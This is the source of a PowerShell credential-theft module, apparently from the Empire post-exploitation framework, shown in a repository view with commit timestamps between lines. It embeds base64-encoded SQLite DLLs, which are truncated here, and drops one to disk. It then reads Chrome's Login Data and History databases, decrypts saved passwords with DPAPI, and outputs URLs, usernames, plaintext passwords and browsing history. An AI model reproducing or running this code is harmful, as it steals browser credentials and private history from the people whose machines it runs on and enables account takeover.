Empire/data/module_source/collection/Get-ChromeDump.ps1

209 lines
3.9 MiB
PowerShell
Raw Normal View History

2015-11-25 16:55:36 +00:00
Function Get-ChromeDump{
<#
.SYNOPSIS
This function returns any passwords and history stored in the chrome sqlite databases.
.DESCRIPTION
This function uses the System.Data.SQLite assembly to parse the different sqlite db files used by chrome to save passwords and browsing history. The System.Data.SQLite assembly
cannot be loaded from memory. This is a limitation for assemblies that contain any unmanaged code and/or compiled without the /clr:safe option.
.PARAMETER OutFile
Switch to dump all results out to a file.
.EXAMPLE
Get-ChromeDump -OutFile "$env:HOMEPATH\chromepwds.txt"
Dump All chrome passwords and history to the specified file
.LINK
http://www.xorrior.com
2015-11-25 16:55:36 +00:00
#>
[CmdletBinding()]
param(
[Parameter(Mandatory = $False)]
[string]$OutFile
)
#Add the required assembly for decryption
Add-Type -Assembly System.Security
#Check to see if the script is being run as SYSTEM. Not going to work.
if(([System.Security.Principal.WindowsIdentity]::GetCurrent()).IsSystem){
Write-Warning "Unable to decrypt passwords contained in Login Data file as SYSTEM."
2015-11-25 16:55:36 +00:00
$NoPasswords = $True
}
if([IntPtr]::Size -eq 8)
{
#64 bit version
$assembly = "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
}
else
{
#32 bit version
$assembly = "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
}
2015-11-25 16:55:36 +00:00
#Unable to load this assembly from memory. The assembly was most likely not compiled using /clr:safe and contains unmanaged code. Loading assemblies of this type from memory will not work. Therefore we have to load it from disk.
#DLL for sqlite queries and parsing
2015-11-25 16:55:36 +00:00
#http://system.data.sqlite.org/index.html/doc/trunk/www/downloads.wiki
Write-Verbose "[+]System.Data.SQLite.dll will be written to disk"
$content = [System.Convert]::FromBase64String($assembly)
2015-11-25 16:55:36 +00:00
$assemblyPath = "$($env:LOCALAPPDATA)\System.Data.SQLite.dll"
2015-11-25 16:55:36 +00:00
if(Test-path $assemblyPath)
{
try
{
2015-11-25 16:55:36 +00:00
Add-Type -Path $assemblyPath
}
catch
{
Write-Warning "[!]Unable to load SQLite assembly"
2015-11-25 16:55:36 +00:00
break
}
}
else
{
[System.IO.File]::WriteAllBytes($assemblyPath,$content)
Write-Verbose "[+]Assembly for SQLite written to $assemblyPath"
try
{
Add-Type -Path $assemblyPath
}
catch
{
Write-Warning "[!]Unable to load SQLite assembly"
break
}
}
2015-11-25 16:55:36 +00:00
#Check if Chrome is running. The data files are locked while Chrome is running
if(Get-Process | Where-Object {$_.Name -like "*chrome*"}){
Write-Warning "[!]Cannot parse Data files while chrome is running"
2015-11-25 16:55:36 +00:00
break
}
#grab the path to Chrome user data
$OS = [environment]::OSVersion.Version
if($OS.Major -ge 6){
$chromepath = "$($env:LOCALAPPDATA)\Google\Chrome\User Data\Default"
}
else{
$chromepath = "$($env:HOMEDRIVE)\$($env:HOMEPATH)\Local Settings\Application Data\Google\Chrome\User Data\Default"
}
if(!(Test-path $chromepath)){
Throw "Chrome user data directory does not exist"
}
else{
#DB for CC and other info
if(Test-Path -Path "$chromepath\Web Data"){$WebDatadb = "$chromepath\Web Data"}
#DB for passwords
if(Test-Path -Path "$chromepath\Login Data"){$loginDatadb = "$chromepath\Login Data"}
#DB for history
if(Test-Path -Path "$chromepath\History"){$historydb = "$chromepath\History"}
#$cookiesdb = "$chromepath\Cookies"
}
if(!($NoPasswords)){
#Parse the login data DB
$connStr = "Data Source=$loginDatadb; Read Only=True; Version=3;"
2015-11-25 16:55:36 +00:00
$connection = New-Object System.Data.SQLite.SQLiteConnection($connStr)
$OpenConnection = $connection.OpenAndReturn()
Write-Verbose "Opened DB file $loginDatadb"
2015-11-25 16:55:36 +00:00
$query = "SELECT * FROM logins;"
$dataset = New-Object System.Data.DataSet
$dataAdapter = New-Object System.Data.SQLite.SQLiteDataAdapter($query,$OpenConnection)
[void]$dataAdapter.fill($dataset)
$logins = @()
Write-Verbose "Parsing results of query $query"
2015-11-25 16:55:36 +00:00
$dataset.Tables | Select-Object -ExpandProperty Rows | ForEach-Object {
$encryptedBytes = $_.password_value
$username = $_.username_value
$url = $_.action_url
$decryptedBytes = [Security.Cryptography.ProtectedData]::Unprotect($encryptedBytes, $null, [Security.Cryptography.DataProtectionScope]::CurrentUser)
$plaintext = [System.Text.Encoding]::ASCII.GetString($decryptedBytes)
$login = New-Object PSObject -Property @{
URL = $url
PWD = $plaintext
User = $username
}
$logins += $login
}
}
#Parse the History DB
$connString = "Data Source=$historydb; Version=3;"
$connection = New-Object System.Data.SQLite.SQLiteConnection($connString)
$Open = $connection.OpenAndReturn()
Write-Verbose "Opened DB file $historydb"
2015-11-25 16:55:36 +00:00
$DataSet = New-Object System.Data.DataSet
$query = "SELECT * FROM urls;"
$dataAdapter = New-Object System.Data.SQLite.SQLiteDataAdapter($query,$Open)
[void]$dataAdapter.fill($DataSet)
$History = @()
$dataset.Tables | Select-Object -ExpandProperty Rows | ForEach-Object {
$HistoryInfo = New-Object PSObject -Property @{
Title = $_.title
URL = $_.url
}
$History += $HistoryInfo
}
if(!($OutFile)){
"[*]CHROME PASSWORDS`n"
$logins | Format-Table URL,User,PWD -AutoSize | Out-String
"[*]CHROME HISTORY`n"
$History | Format-List Title,URL | Out-String
2015-11-25 16:55:36 +00:00
}
else {
"[*]LOGINS`n" | Out-File $OutFile
$logins | Out-File $OutFile -Append
"[*]HISTORY`n" | Out-File $OutFile -Append
$History | Out-File $OutFile -Append
}
Write-Warning "[!] Please remove SQLite assembly from here: $assemblyPath"
2015-11-25 16:55:36 +00:00
}